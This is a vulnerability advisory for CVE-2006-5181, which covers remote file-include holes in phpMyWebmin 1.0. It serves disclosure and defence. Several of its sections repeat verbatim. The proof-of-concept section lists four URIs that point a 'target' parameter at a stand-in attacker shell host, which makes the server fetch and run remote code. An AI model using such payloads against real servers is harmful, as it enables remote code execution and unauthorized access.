phpMyWebmin Multiple Remote File Include Vulnerabilities
BID:20281
Info
phpMyWebmin Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 20281 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-5181 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 30 2006 12:00AM |
| Updated: | Jul 06 2016 02:02PM |
| Credit: | XORON discovered these vulnerabilities. |
| Vulnerable: |
phpMyWebmin phpMyWebmin 1.0 |
| Not Vulnerable: | |
Discussion
phpMyWebmin Multiple Remote File Include Vulnerabilities
phpMyWebmin is affected by multiple remote file-include vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code on an affected computer with the privileges of the webserver process. This may potentially facilitate unauthorized access.
phpMyWebmin 1.0 and prior versions are vulnerable.
phpMyWebmin is affected by multiple remote file-include vulnerabilities.
An attacker may leverage these issues to execute arbitrary script code on an affected computer with the privileges of the webserver process. This may potentially facilitate unauthorized access.
phpMyWebmin 1.0 and prior versions are vulnerable.
Exploit / POC
phpMyWebmin Multiple Remote File Include Vulnerabilities
Attackers can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/change_preferences2.php?target=http://SH3LL?
http://www.example.com/create_file.php?target=http://SH3LL?
http://www.example.com/upload_local.php?target=http://SH3LL?
http://www.example.com/upload_multi.php?target=http://SH3LL?
Attackers can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/change_preferences2.php?target=http://SH3LL?
http://www.example.com/create_file.php?target=http://SH3LL?
http://www.example.com/upload_local.php?target=http://SH3LL?
http://www.example.com/upload_multi.php?target=http://SH3LL?
Solution / Fix
phpMyWebmin Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
phpMyWebmin Multiple Remote File Include Vulnerabilities
References:
References: